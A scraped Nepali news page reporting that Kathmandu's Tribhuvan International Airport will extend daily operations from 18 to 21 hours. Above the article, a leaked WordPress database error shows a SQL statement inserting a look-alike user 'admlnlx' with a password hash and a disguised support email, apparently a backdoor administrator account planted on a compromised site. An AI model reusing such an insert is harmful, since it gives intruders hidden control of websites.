WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPOp.MrdyW.jKXd90J8T8SZBAWsk9X1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 20:55:39', '', 'admlnlx', 'admlnlx')
काठमाडौँः त्रिभुवन अन्तर्राष्ट्रिय विमानस्थल आजदेखि दैनिक २१ घण्टा सञ्चालनमा आउने भएको छ। विमानस्थलमा बढ्दो चाप व्यवस्थापनका लागि दैनिक १८ घण्टाबाट २१ घण्टा सञ्चालनमा ल्याउन लागिएको हो। तीन घण्टा थप विमानस्थल सञ्चालनका लागि आवश्यक कर्मचारी व्यवस्थापन लगायतका काम सम्पन्न भइसकेका छन्।
तीन घण्टा समय थप भएपछि अब बिहान ६ बजेदेखि अब अर्को दिन बिहान ३ बजेसम्म विमानस्थल सञ्चालनमा आउनेछ। अहिले बिहान ६ बजेदेखि राति १२ बजेसम्म विमानस्थल सञ्चालन भइरहेको छ।
रवीन्द्र अधिकारी पर्यटनमन्त्री भएपछि विमानस्थल दैनिक २१ घण्टा सञ्चालन गर्ने योजना सार्वजनिक गरेका थिए। सोही योजना अनुसार विमानस्थल २१ घण्टा सञ्चालनमा ल्याउन लागिएको हो।